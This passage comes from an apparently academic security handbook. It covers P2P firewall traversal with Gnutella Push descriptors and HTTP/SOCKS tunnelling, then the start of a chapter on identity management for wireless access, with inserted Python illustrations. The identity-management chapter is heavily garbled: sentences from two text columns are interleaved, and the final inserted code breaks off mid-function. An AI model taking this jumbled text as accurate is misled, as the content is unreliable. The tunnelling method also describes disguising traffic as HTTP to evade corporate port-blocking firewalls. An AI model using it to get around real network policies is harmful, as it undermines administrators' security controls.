Mateli, P. (2006). Hacking techniques in wireless networks. In H. Bidgoli (Ed.), Handbook of information security (pp. 83-93). John Wiley & Sons.

Nichols, R. K., & Lekkas, P. C. (2002). Telephone system vulnerabilities. McGraw-Hill.

Phifer, L. (2006). Wireless attacks, A to Z. Retrieved April 10, 2006, from http://searchsecurity.techtarget.com/generic/0,295582,sid14_gci1167611,00.html

Samad, K., Ahmed, E., & Mahmood, W. (2005, September 15-17). Simplified clustering approach for intrusion detection in mobile ad hoc networks. In 13th International Conference on Software, Telecommunications and Computer Networks (SoftCOM 2005). Split, Croatia.

Schäfer, G. (2003). Security in fixed and wireless networks: An introduction to securing data communications. John Wiley and Sons.

Valli, C. (2004, June 28-29). WITS—Wireless intrusion tracking system. 3rd European Conference on Information Warfare and Security. UK.

Vladimirov, A. A., Gavrilenko, K. V., & Mikhailovsky, A. A. (2004). Counterintelligence: Wireless IDS systems. In WI-Foo: The secrets of wireless hacking (pp. 435-456). Pearson/Addison-Wesley.

Zhang, Y., Lee, W., & Huang, Y. (2003). Intrusion detection techniques for mobile wireless networks. Wireless Networks Journal, 9(5), 545-556.

KEY TERMS

Access Point (AP): An access point is the base station in a wireless LAN. APs are typically stand-alone devices that plug into an Ethernet hub or switch. Like a cellular phone system, users can roam around with their mobile devices and be handed off from one AP to the other.

Ad Hoc Networks: Ad hoc networks are local area networks or other small networks, especially ones with wireless or temporary plug-in connections, in which some of the network devices are part of the network only for the duration of a communications session or, in the case of mobile or portable devices, while in some close proximity to the rest of the network.

Intrusion Prevention System (IPS): IPS is the software that prevents an attack on a network or computer system. An IPS is a significant step beyond an intrusion detection system (IDS), because it stops the attack from damaging or retrieving data. Whereas an IDS passively monitors traffic by sniffing packets off a switch port, an IPS resides inline like a firewall, intercepting and forwarding packets. It can thus block attacks in real time.

Intrusion Tolerance: Intrusion tolerance is the ability to continue delivering a service when an intrusion occurs.

Wireless Attack: A wireless attack is a malicious action against wireless system information or wireless networks; examples can be denial of service attacks, penetration, and sabotage.

Wireless Intrusion Detection System (WIDS): The WIDS is the software that detects an attack on a wireless network or wireless system. A network IDS (NIDS) is designed to support multiple hosts, whereas a host IDS (HIDS) is set up to detect illegal actions within the host. Most IDS programs typically use signatures of known cracker attempts to signal an alert. Others look for deviations from the normal routine as indications of an attack. Intrusion detection is very tricky.

Wireless Sensor Networks (WSN): WSN is a network of RF transceivers, sensors, machine controllers, microcontrollers, and user interface devices with at least two nodes communicating by means of wireless transmissions.

Wireless Traffic Anomaly: Wireless traffic anomaly is a deviation from the normal wireless traffic pattern. An intrusion detection system (IDS) may look for unusual traffic activities. Wireless traffic anomalies can be used to identify unknown attacks and DoS floods.

Wireless Vulnerability: Wireless vulnerability is a security exposure in wireless components. Before the Internet became mainstream and exposed every organization in the world to every attacker on the planet, vulnerabilities surely existed, but were not as often exploited.




Chapter VII
Peer-to-Peer (P2P)
Network Security:
Firewall Issues

Lu Yan
University College London, UK

INTRODUCTION

A lot of networks today are behind firewalls. In peer-to-peer (P2P) networking, firewall-protected peers may have to communicate with peers outside the firewall. This chapter shows how to design P2P systems to work with different kinds of firewalls within the object-oriented action systems framework by combining formal and informal methods. We present our approach via a case study of extending a Gnutella-like P2P system (Yan & Sere, 2003) to provide connectivity through firewalls.

PROBLEM DEFINITION

As firewalls have various topologies (single, double, nested, etc.) and various security policies (packet filtering, one-way-only, port limiting, etc.), our problem has multiple faces and applications have a multitude of requirements. A general solution that fits all situations seems to be infeasible in this case. Thus we define the problem as shown in Figure 1: How to provide connectivity between private peers and public peers through a single firewall?

We select the object-oriented action systems framework with Unified Modeling Language (UML) diagrams as the foundation to work on. In this way, we can address our problem in a unified framework with benefits from both formal and informal methods.

Action systems is a state based formalism. It is derived from the guarded command language of Dijkstra (1976) and defined using weakest precondition predicate transformers. An action, or guarded command, is the basic building block

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
P2P Network Security

Figure 1. Problem definition

in the formalism. An action system is an iterative composition of actions. The action systems framework is used as a specification language and for the correct development of distributed systems. Object-oriented (OO)-action system is an extension to the action system framework with OO support. An OO-action system consists of a finite set of classes, each class specifying the behavior of objects that are dynamically created and executed in parallel. The formal nature of OO-action systems makes it a good tool to build reliable and robust systems. Meanwhile, the OO aspect of OO-action systems helps to build systems in an extendable way, which will generally ease and accelerate the design and implementation of new services or functionalities. Furthermore, the final set of classes in the OO-action system specification is easy to implement in popular OO languages like Java, C++ or C#. In this chapter, however, we skip the details of the semantics of action systems (Back & Sere, 1996) and its OO extension (Bonsangue, Kok, & Sere, 1998).

GNUTELLA NETWORK

Gnutella (Ivkovic, 2001) is a decentralized P2P file-sharing model that enables file sharing without using servers. To share files using the Gnutella model, a user starts with a networked computer A with a Gnutella servent, which works both as a server and a client. Computer A will connect to another Gnutella-networked computer B and then announce that it is alive to computer B. B will in turn announce to all its neighbors C, D, E, and F that A is alive. Those computers will recursively continue this pattern and announce to their neighbors that computer A is alive. Once computer A has announced that it is alive to the rest of the members of the P2P network, it can then search the contents of the shared directories of the P2P network.

Search requests are transmitted over the Gnutella network in a decentralized manner. One computer sends a search request to its neighbors, which in turn pass that request along to their neighbors, and so on. Figure 2 illustrates this model. The search request from computer A will be transmitted to all members of the P2P network, starting with computer B, then to C, D, E, F, which will in turn send the request to their neighbors, and so forth.

If one of the computers in the P2P network, for example, computer F, has a match, it transmits the file information (name, location, etc.) back through all the computers in the pathway towards A (via computer B in this case). Computer A will then be able to open a direct connection with computer F and will be able to download that file directly from computer F.

UNIDIRECTIONAL FIREWALLS

Most corporate networks today are configured to allow outbound connections (from the firewall protected network to the Internet), but deny inbound connections (from the Internet to the firewall protected network) as illustrated in Figure 3.


Figure 2. Gnutella peer-to-peer model

These corporate firewalls examine the packets of information sent at the transport level to determine whether a particular packet should be blocked. Each packet is either forwarded or blocked based on a set of rules defined by the firewall administrator. With packet-filtering rules, firewalls can easily track the direction in which a TCP connection is initiated. The first packets of the TCP three-way handshake are uniquely identified by the flags they contain, and firewall rules can use this information to ensure that certain connections are initiated in only one direction. A common configuration for these firewalls is to allow all connections initiated by computers inside the firewall, and restrict connections from computers outside the firewall. For example, firewall rules might specify that users can browse from their computers to a web server on the Internet, but an outside user on the Internet cannot browse to the protected user's computer.

In order to traverse this kind of firewall, we introduce a Push descriptor and routing rules for servents: Once a servent receives a QueryHit descriptor, it may initiate a direct download, but it is impossible to establish the direct connection if the servent is behind a firewall that does not permit incoming connections to its Gnutella port. If this direct connection cannot be established, the servent attempting the file download may request that the servent sharing the file push the file instead. That is, a servent may send a Push descriptor if it receives a QueryHit descriptor from a servent that does not support incoming connections.

Intuitively, Push descriptors may only be sent along the same path that carried the incoming QueryHit descriptors, as illustrated in Figure 4. A servent that receives a Push descriptor with ServentID = n, but has not seen a QueryHit descriptor with ServentID = n, should remove the Push descriptor from the network. This ensures that only those servents that routed the QueryHit descriptors will see the Push descriptor.

We extend our original system specification (Yan & Sere, 2003) to adopt unidirectional firewalls by adding a Push router Rf, which is a new action system modeling Push routing rules as shown in Table 1. We compose it with the previous two action systems (Yan & Sere, 2003), Rc modeling Ping-Pong routing rules and Rl modeling Query-QueryHit routing rules, to derive a new specification of the router:

R = |[ Rc // Rl // Rf ]|
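The Push routing rule just stated (forward a Push only along the path that carried the matching QueryHit, drop it otherwise) and the serventDB bookkeeping of the Push router Rf in Table 1, as an added Python example that is not code from the chapter or from the Yan & Sere system; the message fields, TTL value and the small A-B-F path are assumptions made for the demonstration.

```python
"""Push-descriptor routing for the unidirectional-firewall case.

Added example, not code from the chapter or from the Yan & Sere system:
it implements in Python the Push routing rule of Table 1 (serventDB) and
the prose rule above it. Message fields, the TTL value and the in-memory
path used for the demonstration are assumptions made here.
"""
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class Msg:
    type: str         # "QueryHit" or "Push"
    servent_id: str   # ServentID of the servent that answered the query
    ttl: int
    info: dict = field(default_factory=dict)


@dataclass
class PushRouter:
    """Mirrors Rf in Table 1. serventDB records the ServentIDs of the QueryHit
    descriptors this node has routed; a Push descriptor is forwarded only
    when its ServentID is in serventDB, otherwise it is removed."""
    this_ip: str
    servent_db: set = field(default_factory=set)
    push_target: Optional[tuple] = None
    outgoing: list = field(default_factory=list)

    def receive(self, m: Msg) -> str:
        if m.type == "QueryHit":
            # Rl (Query/QueryHit routing) is not modelled here: every QueryHit
            # is assumed to be on a valid return path and is forwarded.
            self.servent_db.add(m.servent_id)
            return self.forward(m)
        if m.type == "Push":
            if m.info["destinationIP"] == self.this_ip:
                # This node is the firewalled servent: hand the request to the
                # file repository, which opens the outbound connection (Table 2).
                self.push_target = (m.info["requestIP"], m.info["filename"],
                                    m.info["destinationIP"])
                return "delivered"
            if m.servent_id in self.servent_db:
                return self.forward(m)
            return "dropped"        # no QueryHit seen with this ServentID
        return "ignored"

    def forward(self, m: Msg) -> str:
        if m.ttl <= 0:
            return "expired"
        self.outgoing.append(Msg(m.type, m.servent_id, m.ttl - 1, m.info))
        return "forwarded"


def walk(path: list, first: Msg) -> list:
    """Deliver `first` to path[0], then pass each forwarded copy to the next
    node; returns one outcome string per node on the path."""
    outcomes, m = [], first
    for node in path:
        outcomes.append(node.receive(m))
        if not node.outgoing:
            break
        m = node.outgoing.pop(0)
    return outcomes


def demo() -> dict:
    # Constructed topology: A -- B -- F, with C a neighbour of B that never
    # routed F's QueryHit. F is the firewalled servent (ServentID "sid-F").
    a, b, c, f = (PushRouter(ip) for ip in ("10.0.0.1", "10.0.0.2",
                                           "10.0.0.3", "192.0.2.9"))
    hit = Msg("QueryHit", "sid-F", ttl=3,
              info={"IP": f.this_ip, "filename": "paper.pdf"})
    walk([b, a], hit)                      # QueryHit travels F -> B -> A
    push = Msg("Push", "sid-F", ttl=3,
               info={"requestIP": a.this_ip, "filename": "paper.pdf",
                     "destinationIP": f.this_ip})
    on_path = walk([b, f], push)           # Push retraces A -> B -> F
    stray = c.receive(push)                # C saw no QueryHit from sid-F
    return {"on_path": on_path, "stray": stray, "target": f.push_target}
```

Running `demo()` shows B forwarding the Push because it routed F's QueryHit, F accepting it as its own push target, and C removing the same descriptor from the network.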


Figure 3. Unidirectional firewall

Figure 4. Push routing

On the higher level, the components of the new router are

{<Router, R>, <PingPongRouter, Rc>, <QueryRouter, Rl>, <PushRouter, Rf>}.

A servent can request a file push by routing a Push request back to the servent that sent the QueryHit descriptor describing the target file. The servent that is the target of the Push request should, upon receipt of the Push descriptor, attempt to establish a new TCP/IP connection to the requesting servent. As specified in the refined file repository in Table 2, when the direct connection is established, the firewalled servent should immediately send an HTTP GIV request with requestIP, filename and destinationIP information, where requestIP and destinationIP are the IP address information of the firewalled servent and the target servent for the Push request, and filename is the requested file information. In this way, the initial TCP/IP connection becomes an outbound one, which is allowed by unidirectional firewalls. Receiving the HTTP GIV request, the target servent should extract the requestIP and filename information, and then construct an HTTP GET request with the above information. After that, the file download process is identical to the normal file download process without firewalls. We summarize the sequence of a Push session in Figure 5.

PORT-BLOCKING FIREWALLS

In corporate networks, other kinds of common firewalls are port-blocking firewalls, which usually do not grant long-time and trusted privileges to ports and protocols other than port 80 and HTTP/HTTPS.


Table 1. Specification of push router

Rf = |[ attr serventDB := null; cKeyword := null; filename := null; target := null; pushTarget := null
        obj receivedMsg : Msg; newMsg : Msg; f : FileRepository
        meth SendPush() = (newMsg := new(Msg(Push));
                           newMsg.info.requestIP := ThisIP;
                           newMsg.info.filename := receivedMsg.info.filename;
                           newMsg.info.destinationIP := receivedMsg.info.IP;
                           OutgoingMessage := newMsg);
             ReceiveMsg() = receivedMsg := IncomingMessage;
             ForwardMsg(m) = (m.TTL > 0 → m.Transmit(); OutgoingMessage := m)
        do true →
             ReceiveMsg();
             if receivedMsg.type = QueryHit →
                  serventDB := serventDB ∪ receivedMsg.serventID;
                  if receivedMsg.info.keyword = cKeyword →
                       target := receivedMsg.info.filename @ receivedMsg.info.IP;
                       if f.firewall → SendPush() fi;
                       cKeyword := null
                  [] receivedMsg.info.keyword ≠ cKeyword ∧ receivedMsg.descriptorID ∈ descriptorDB →
                       ForwardMsg(receivedMsg)
                  fi
             [] receivedMsg.type = Push →
                  if receivedMsg.info.destinationIP = ThisIP →
                       PushTarget := receivedMsg.info.requestIP @ receivedMsg.info.filename @ receivedMsg.info.destinationIP
                  [] receivedMsg.info.destinationIP ≠ ThisIP ∧ receivedMsg.serventID ∈ serventDB →
                       ForwardMsg(receivedMsg)
                  fi
             fi
        od
     ]|

For example, port 21 (standard FTP access) and port 23 (standard Telnet access) are usually blocked and applications are denied network traffic through these ports. In this case, HTTP (port 80) has become the only entry mechanism to the corporate network. Using the HTTP protocol, for a servent to communicate with another servent through port-blocking firewalls, the servent has to pretend that it is an HTTP server, serving WWW documents. In other words, it is going to mimic an httpd program.

When it is impossible to establish an IP connection through a firewall, two servents that need to talk directly to each other solve this problem by having SOCKS support built into them, and having a SOCKS proxy running on both sides. As illustrated in Figure 6, it builds an HTTP tunnel between the two servents.

After initialization, the SOCKS proxy creates a ProxySocket and starts accepting connections on the Gnutella port. All the information to be sent by the attempting servent is formatted as a URL message (using the GET method of HTTP) and an URLConnection via the HTTP protocol (port 80) is


Figure 5. Sequence diagram of a push session

made. On the other side, the target servent accepts the request and a connection is established with the attempting servent (actually with the SOCKS proxy in the target servent). The SOCKS proxy in the target servent can read the information sent by the attempting servent and write back to it. In this way, transactions between two servents are enabled.

We extend our original system specification (Yan & Sere, 2003) to adopt port-blocking firewalls by adding a new layer to the architecture of the servent in Figure 7. This layer will act as a tunnel between the servent and the Internet.

As specified in Table 3, after receiving messages from the attempting servent and encoding them into HTTP format, the SOCKS proxy sends the messages to the Internet via port 80. In the reverse way, the SOCKS proxy keeps receiving messages from the HTTP port and decoding them into the original format. With this additional layer, our system can traverse port-blocking firewalls without any changes in its core parts. We summarize the sequence of a SOCKS proxy session in Figure 8.

CONCLUSION

The corporate firewall is a double-edged sword. It helps prevent unauthorized access to the corporate Web, but may disable access for legitimate P2P applications. There have been protocols such as Point-to-Point Tunneling Protocol (PPTP) (Hamzeh et al., 1999), Universal Plug and Play (UPNP) (Microsoft, 2000), Realm Specific IP (RSIP) (Borella & Montenegro, 2000) and the Middlebox protocol (Reynolds & Ghosal, 2002) to address the firewall problems in P2P networking. A recent protocol, JXTA (Gong, 2001) from Sun, has provided an alternative solution to the firewall problem by adding a publicly addressable node, called a rendezvous server, which a firewalled peer can already talk to. The scheme is that peers interact mostly with their neighbors who are on the same side of the firewall as they are, and one or a small number of designated peers can bridge between peers on the different sides of the firewall. But the problem posed by firewalls still remains when configuring the firewalls to allow traffic through these bridge peers.

We have specified a Gnutella-like P2P system within the OO-action systems framework by combining UML diagrams. In this chapter, we have presented our solution to traverse firewalls in P2P systems.

Table 2. Specification of file repository

F = |[ attr firewall* := false; fileDB := FileDB; cFileDB; filename := null; target := null; pushTarget := null
       meth SetTarget(t) = (target := t);
            PushTarget(t) = (pushTarget := t);
            Has(key) = (key ∈ dom(fileDB));
            Find(key) = (filename := file ∧ {file} = ran({key} ◁ fileDB))
       do target ≠ null →
            cFileDB := fileDB;
            HTTP_GET(target);
            target := null;
            Refresh(fileDB);
            if fileDB = cFileDB → firewall := true
            [] fileDB ≠ cFileDB → firewall := false
            fi
       [] pushTarget ≠ null →
            HTTP_GIV(pushTarget);
            pushTarget := null;
            Refresh(fileDB)
       od
    ]|

Figure 7. Refined architecture of servent

Figure 6. Firewall architecture and extendable socket

Table 3. Specification of SOCKS proxy

S = |[ attr listenPort := GnutellaPort; destinationPort := 80
       obj ProxySocket : Socket; HTTPSocket : Socket; imsg : Msg; omsg : Msg
       init ProxySocket := new(Socket(listenPort)); HTTPSocket := new(Socket(destinationPort))
       do IncomingRequest ≠ null →
            imsg := EncodeSOCK(DecodeHTTP(HTTPSocket.Read()));
            IncomingMessage := ProxySocket.Write(imsg)
       [] OutgoingRequest ≠ null →
            omsg := EncodeHTTP(DecodeSOCK(ProxySocket.Read()));
            OutgoingMessage := HTTPSocket.Write(omsg)
       od
    ]|

We have extended a Gnutella-style P2P system to adopt unidirectional firewalls and port-blocking firewalls using OO-action systems. During the extending work, our experiences show that the OO aspect of OO-action systems helps to build systems with a reusable, composable, and extendable architecture. The modular architecture of our system makes it easy to incorporate new services and functionalities without great changes to its original design.

REFERENCES

Back, R. J. R., & Sere, K. (1996). From action systems to modular systems. Software Concepts and Tools.

Bonsangue, M., Kok, J. N., & Sere, K. (1998). An approach to object-orientation in action systems. In Proceedings of Mathematics of Program Construction (MPC'98) (LNCS 1422). Springer-Verlag.

Borella, M., & Montenegro, G. (2000). RSIP: Address sharing with end-to-end security. In Proceedings of the Special Workshop on Intelligence at the Network Edge, CA.

Figure 8. Sequence diagram of a SOCKS proxy session

Dijkstra, E. W. (1976). A discipline of programming. Prentice-Hall International.

Gong, L. (2001). JXTA: A network programming environment. IEEE Internet Computing.

Hamzeh, K., Pall, G., Verthein, W., Taarud, J., Little, W., & Zorn, G. (1999). Point-to-point tunneling protocol (PPTP) (RFC 2637). Retrieved from http://www.ietf.org/rfc/rfc2637.txt

Ivkovic, I. (2001). Improving Gnutella protocol: Protocol analysis and research proposals (Tech. Rep.). LimeWire LLC.

Microsoft. (2000). Understanding universal plug and play. White paper. Redmond, WA: Author.

Reynolds, B., & Ghosal, D. (2002). STEM: Secure telephony enabled middlebox [Special issue]. IEEE Communications.

Yan, L., & Sere, K. (2003). Stepwise development of peer-to-peer systems. In Proceedings of the 6th International Workshop in Formal Methods (IWFM'03), Dublin, Ireland.

KEY TERMS

Action System: An action system is a notation for writing programs, due to Ralph Back. An action system is a collection of actions. It is executed by repeatedly choosing an action to execute. If it is the case that no action is able to be executed, then execution of the action system stops.

Firewall: A firewall is a piece of hardware and/or software which functions in a networked environment to prevent some communications forbidden by the security policy, analogous to the function of firewalls in building construction.

Peer-to-Peer (P2P): A peer-to-peer (P2P) computer network is a network that relies primarily on the computing power and bandwidth of the participants in the network rather than concentrating it in a relatively low number of servers. P2P networks are typically used for connecting nodes via largely ad hoc connections.


Chapter VIII
Identity Management for
Wireless Service Access
Mohammad M. R. Chowdhury
University Graduate Center – UniK, Norway

Josef Noll
University Graduate Center – UniK, Norway

AbstrAct

Ubiquitous access and pervasive computing concept is almost intrinsically tied to wireless communica-
tions. Emerging next-generation wireless networks enable innovative service access in every situation.
Apart from many remote services, proximity services will also be widely available. People currently rely
on numerous forms of identities to access these services. The inconvenience of possessing and using these
identities creates significant security vulnerability, especially from network and d…
wireless service access. After explaining the current identity solutions scenarios, the chapter illustrates
the on-going efforts by various organizations, the requirements and frameworks to develop an innovative,
easy-to-use identity management mechanism to access the future diverse service worlds. The chapter
also conveys various possibilities, challenges, and research questions evolving in these areas.

INTRODUCTION

Nowadays people are increasingly connected through wireless networks from public places to their office/home areas. The deployment of packet-based mobile networks has provided mobile users with the capability to access data services in every situation. The next-generation wireless network is expected to integrate various radio systems including third generation (3G), wireless LANs (WLANs), fourth generation (4G), and others. One motivation of this network is the pervasive computing abilities, which provide automatic handovers for any moving computing devices in a globally networked environment. Fast vertical handover is considered important for managing continued access to different types of network resources in next generation networks (Li et al., 2005). Such networks will provide ubiquitous service access taking the advantages of each of these forms of wireless communications. Service intake will be increased significantly through the availability and reach of innovative and easy-to-use services. Apart from the remote service access (Web services), the introduction of near field communication (NFC) in use with a mobile phone can enable many new proximity services.

Identity Management

User identity solutions and their hassle-free management will play a vital role in the future ubiquitous service access. Current identity solutions can no longer cope with the increasing expectations of both users and service providers in terms of their usability and manageability. Mobile and Internet service providers are increasingly facing the same identity management challenges as services in both domains continue to flourish. Real-time data communication capabilities of mobile networks will multiply the remote service accesses through mobile networks, if efficient identity management and security is ensured over the wireless access. Personalization through customized user profiles based on their preferences will become an important factor for the success of future wireless service access. In more advanced service scenarios, an open identity management architecture enables the use of standard user profile attributes, like age and gender, and authorizations for service, such as location, to bring a richer user experience. Users, network operators, and service providers can make use of an open standard technology for identity management to meet their own specific requirements through customizations. There is clearly a need for such a standard for identity management that can be applied to all ubiquitous service access scenarios. As user needs are at the center of the service world from a business perspective, the identity management mechanism should be user-centric.

The impressive capabilities and reach of emerging next-generation networks, the abundance of services, and on-going development in user devices require proper attention to the user identity management issues, which have yet to meet the stakeholders' expectations. The main goal of this chapter is to discuss these concerns. The second section discusses the background of identity management. In the third section, requirements and a framework of an identity management mechanism for wireless service access are given, mentioning the current efforts by various organizations. Security issues are also a part of this mechanism. The fourth section provides the future trends. The chapter concludes with a summary of all discussions.

BACKGROUND

In the broadest sense, identity management encompasses definitions and life-cycle management for user identities and profiles, as well as environments for exchanging and validating such information. A service provider issues identity to its users. Identity life-cycle management comprises establishment/re-establishment of identity, description of identity attributes, and at the end revocation of identity. Attributes are a set of characteristics of an identity that are required by the service providers to identify a user during service interactions. The user authenticates to the service providers as the real owner of the identity for accessing services. Authentication is a key aspect of trust-based identity attribution, providing a codified assurance of the identity of one entity to another.

The next-generation wireless network includes a state-of-the-art intelligent core network and various wireless access networks. It is expected to offer sufficient capacity, quality of service (QoS), and interoperability for seamless remote service access. Currently the network and thereby the remote service access are often granted through numerous user identification and authentication mechanisms, such as usernames/passwords/PIN codes/certificates. Users have to register prior to first usage and publish private information, often more than what is strictly necessary for service access. This hampers the user's privacy. There is a growing consensus among the legislators across the world that the individual's rights of privacy and the protection of personal data are equally applicable in the context of the Information Society as in the off-line world. To address this issue, a user-centric identity management framework is expected where users have complete control over the transmission of identity information.

Some services happen in the proximity of users at local access points. These services are accessed through physical interactions with physical cards or devices, for example, payment and admittance. The use of NFC with mobile phones to transfer user information from one device to another boosts the intake of proximity services. The user personal


device is often used to store his/her identity information. To protect against unauthorized service access, users also need to be authenticated before accessing such devices. It is evident that a user is burdened with too many identities to access many remote and proximity services. An integrated approach is required to manage all those identities to access all these services.

Wireless service access results in more complexity to manage identities prior to accessing the services. Besides device authentications, users need to authenticate themselves before accessing the wireless networks. In addition to this, because of the size limitations, mobile devices are equipped with smaller screens and limited data entry capabilities using small keypads. For wireless services to succeed, it is critical that the mobile users are able to get convenient and immediate access to the information and services they need without going through long menus and having to enter various usernames and passwords.

In the future, one of the key issues of identity management in the wireless domain will be who the identity providers will be to the users and who will own/manage the subscriber identity module (SIM/USIM). This is because, currently, almost every service provider is also an identity provider for users to access that specific service. The SIM card is in fact a smart card with processing and information storage capabilities. With the development of powerful, sophisticated as well as secure smart cards, it is now considered as the storage place for the user's identity information. In current cellular models, the operator provides not only the wireless access but also owns and manages the SIM/USIM.

In general, common identity deployment architectures can be broadly classified into three types: Silo, Walled Garden, and Federation (Altmann & Sampath, 2006, p. 496). Current identity management in the service world is mostly silo-based. Silo is a simple architecture, which requires each service provider to maintain a unique ID for each user. This approach is simpler from a service provider's point of view but it is not only laborious but also problematic for the user. Moreover, it results in a huge waste of resources due to the possession of redundant identity information in the service world. As studies show, users who register with several service providers routinely forget their passwords for less frequently used accounts. This has a significant financial effect. On average, $45 is spent on password reset each time a user forgets a password (Altmann & Sampath, 2006, p. 496). Walled Garden is a centralized identity management approach where all service providers can typically rely on one single identity provider to manage the user's identity. The user benefits through managing only a single set of credentials. Its inherent weakness is that, once the single barrier of protection is compromised, a malicious user enjoys unbridled access to all resources. Lastly, in identity federation management a group of service providers forms a federation. Here, each service provider recognizes the identifiers of other service providers and thereby considers a user who has been authenticated by another service provider to be authenticated as well. However, the real distinction between the Walled Garden and Federation approaches is that here service providers have their own unique identifiers and credentials. Though
this case, the user has little control over his/her this approach is widely accepted considering the
identity. A user is having a SIM/USIM as his/her heterogeneity of service providers, many possible
identity but is not allowed to modify or update it service interaction scenarios and the requirements
so that he/she cannot subscribe to new wireless of several levels of security make such a system
providers or to whatever service providers he/she far more complex.
likes. A collaborative operator model has been
thought where such identity module belongs to
the user (Kuroda, Yoshida, Ono, Kiyomoto, & IdEntIty MAnAgEMEnt for
Tanaka, 2004, pp. 165-166). A third party can wIrElEss sErvIcE AccEss
provide the infrastructure to manage such identity.
This approach leads towards user-centric identity Designing an identity management mechanism to
managementandprovidestheuserwith exibility
fl
access both remote and proximity services, without
in choosing wireless providers.

0
Identity Management

using numerous inconvenient identity solutions, is Identity Management solutions and


expected to be the main focus in the identity man- controversies
agement for service access over wireless networks.
This section also considers the selection of a user Various institutes and industries are working to de-
identity storage place, the role of identity provider,
velop the required identity management solutions.
and various other requirements to develop such a SXIP (“The SXIP 2.0 Overview,” n.d.). identity
mechanism from a wireless service access point has designed a solution to address the Internet-
of view. scalable and user-centric identity architecture. It
provides user identification, authentication
requirements of Identity Internet form fill solutions using Web interfaces
Management systems for storing user identity, attribute profiles, a
facilitating automatic exchange of identity data
Identity management system should be user-centric. over the Internet. Windows CardSpace uses vari-
It means such a system should reveal information ous virtual cards (mimic physical cards) issued by
identifying a user with user’s consent. Security is theidentityprovidersforuseridentification
one of the most important concerns of this system. authentications, each retrieving identity data from
The system should protect the user against decep- an identity provider in a secure manner (Chowd-
tion, verifying the identity of any parties who hury & Noll, 2007). In the Liberty Alliance Project
ask for information to ensure that it goes to the (Miller et al., 2004), members are working to build
right place. In the user-centric approach, the user open standard-based specifications for federate
will decide and control the extent of identifying identity and interoperability in multiple federa-
information to be transmitted. The system must tions, thereby fostering the usage of identity-based
disclose the least identifying information possible. Web services. Within this, they are focusing on
By following these practices, the least possible end-user privacy and confidentiality issues and
damage can be ensured in the event of a breach. solutions against identity theft. But these efforts
These are some of the requirements to design a are mainly focusing on identity management in
user-centric identity management system in The the Internet domain.
Laws of Identity (Cameron, 2005). Besides working for identity handling in a Web
Identity management system requires an in- domain, Liberty Alliance (Miller et al., 2004)
tegrated and often complex infrastructure where also provides solutions in identity management
all involved parties must be trusted for specific
for mobile operators. It proposes single sign-on
purposes depending on their role. Since there are (SSO) to relieve the users from managing many
costs associated with establishing trust, it will usernames/passwords and for fast access to the
be an advantage to have identity management resources. But in SSO, if a malicious attacker se-
models with simple trust requirements (Jøsang, cures one of the user’s accounts, he/she will enjoy
Fabre, Hay, Dalziel, & Pope, 2005). Success of an unbridled access to data pertaining not only
an identity management system depends upon the to that account but also across all her accounts
ability to interoperate across a trusted network of spread across domains. Therefore, some research
businesses, partners, and services regardless of the approaches do not encourage such SSOs (Altmann
platform, programming language, or application & Sampath, 2006, p. 500). However, a current ver-
with which they are interacting. It should handle sion of liberty, Shibboleth, reduces such risk by
user identities for both remote (Web) and proximity providing an attribute-based authorization system.
service access. Above all, such a system should But in wireless service access, especially for mobile
be user friendly. devices seamless service sign-on solutions and
one-click access to personalized services are key
issues for successful identity management.
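The federation model described earlier (each service provider keeps its own identifiers and credentials but accepts another provider's authentication) and the requirements above (consent, disclosure of the least identifying information, attribute-based authorization rather than blanket single sign-on access) can be made concrete in a small model. The following is an added example written for this page; it is not code from the chapter nor from SXIP, CardSpace, Liberty Alliance or Shibboleth. The IdentityProvider and ServiceProvider classes, the per-SP HMAC trust key standing in for a real signed assertion, and the constructed user profile are all assumptions of the example.

```python
"""Federated, attribute-based authorisation with minimal disclosure.

Added example: not code from the chapter or from any identity product.
Trust between the IdP and each SP is modelled with a per-SP HMAC key
(an assumption for a self-contained example; real federations use signed
assertions with public-key signatures).
"""
import hashlib
import hmac
import json
import secrets
import time


class IdentityProvider:
    def __init__(self):
        self.users = {}      # user_id -> full attribute profile (never sent as a whole)
        self.sp_keys = {}    # sp_id -> key shared with that SP (federation trust)
        self.sp_attrs = {}   # sp_id -> attributes that SP may receive

    def register_user(self, user_id, attributes):
        self.users[user_id] = dict(attributes)

    def federate(self, sp_id, allowed_attributes):
        """Admit an SP to the federation and return its trust key."""
        key = secrets.token_bytes(32)
        self.sp_keys[sp_id] = key
        self.sp_attrs[sp_id] = set(allowed_attributes)
        return key

    def issue_assertion(self, user_id, sp_id, requested):
        """Return (payload, tag). Only attributes the SP both asked for and is
        allowed to see are included (minimal disclosure), and the subject is a
        pairwise pseudonym so each SP sees its own identifier for the user."""
        profile = self.users[user_id]
        disclosed = {a: profile[a] for a in requested
                     if a in self.sp_attrs[sp_id] and a in profile}
        body = {
            "sub": hashlib.sha256(f"{sp_id}:{user_id}".encode()).hexdigest(),
            "aud": sp_id,
            "iat": int(time.time()),
            "attrs": disclosed,
        }
        payload = json.dumps(body, sort_keys=True).encode()
        tag = hmac.new(self.sp_keys[sp_id], payload, hashlib.sha256).hexdigest()
        return payload, tag


class ServiceProvider:
    def __init__(self, sp_id, trust_key, required):
        self.sp_id = sp_id
        self.trust_key = trust_key
        self.required = required   # attribute -> predicate the value must satisfy

    def authorize(self, payload, tag, max_age=300):
        """Verify the IdP's tag, audience and freshness, then decide on the
        attribute values alone: the SP never holds a password for the user."""
        expected = hmac.new(self.trust_key, payload, hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected, tag):
            return False, "assertion not issued for this SP or tampered with"
        body = json.loads(payload)
        if body["aud"] != self.sp_id:
            return False, "audience mismatch"
        if time.time() - body["iat"] > max_age:
            return False, "assertion expired"
        for attr, satisfied in self.required.items():
            if attr not in body["attrs"] or not satisfied(body["attrs"][attr]):
                return False, f"attribute {attr} missing or not satisfied"
        return True, body["sub"]


def demo():
    """Constructed scenario; returns (shop_ok, ssn_leaked, cross_sp_ok, tamper_ok)."""
    idp = IdentityProvider()
    idp.register_user("alice", {"age": 34, "employer": "ExampleCorp", "ssn": "000-00-0000"})
    shop = ServiceProvider("shop", idp.federate("shop", ["age"]), {"age": lambda v: v >= 18})
    hr = ServiceProvider("hr-portal", idp.federate("hr-portal", ["employer"]),
                         {"employer": lambda v: v == "ExampleCorp"})
    payload, tag = idp.issue_assertion("alice", "shop", ["age", "ssn"])
    shop_ok, _ = shop.authorize(payload, tag)
    ssn_leaked = "ssn" in json.loads(payload)["attrs"]   # SP asked for it, IdP refused
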